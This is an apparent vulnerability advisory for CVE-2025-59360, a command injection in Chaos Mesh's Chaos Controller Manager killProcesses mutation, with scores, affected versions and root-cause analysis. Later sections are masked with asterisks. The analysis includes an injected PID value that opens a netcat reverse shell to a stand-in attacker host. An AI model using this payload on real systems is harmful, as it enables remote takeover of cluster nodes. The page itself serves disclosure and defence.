Miggo Logo

CVE-2025-59360: Chaos Controller Manager is vulnerable to OS command injection

9.8

CVSS Score
3.1

Basic Information

EPSS Score
0.64143%
Published
9/15/2025
Updated
9/15/2025
KEV Status
No
Technology
TechnologyGo

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
github.com/chaos-mesh/chaos-meshgo< 2.7.32.7.3

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability is a classic OS command injection. The killProcesses mutation in the Chaos Controller Manager takes process IDs (PIDs) as input to be killed. This request is forwarded to the chaos-daemon running on the target node. The killProcesses function within the chaos-daemon constructs a kill command by concatenating the user-provided PID string directly into the command line. Because the PID is not validated to be a numeric string, an attacker can inject arbitrary shell commands. For example, a PID of 123; nc -e /bin/sh attacker.com 4444 would execute a reverse shell. The provided commit and pull request are a mitigation that disables the control server by default, reducing the attack surface, but the underlying command injection vulnerability exists in the killProcesses function itself. The actual fix, which is not in the provided commits, would be to sanitize the input and ensure that only valid numeric PIDs are passed to the kill command.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

T** killPro**ss*s mut*tion in ***os *ontroll*r M*n***r is vuln*r**l* to OS *omm*n* inj**tion. In *onjun*tion wit* *V*-****-*****, t*is *llows un*ut**nti**t** in-*lust*r *tt**k*rs to p*r*orm r*mot* *o** *x**ution **ross t** *lust*r.

Reasoning

T** vuln*r**ility is * *l*ssi* OS *omm*n* inj**tion. T** `killPro**ss*s` mut*tion in t** ***os *ontroll*r M*n***r t*k*s pro**ss I*s (PI*s) *s input to ** kill**. T*is r*qu*st is *orw*r*** to t** `***os-***mon` runnin* on t** t*r**t no**. T** `killPro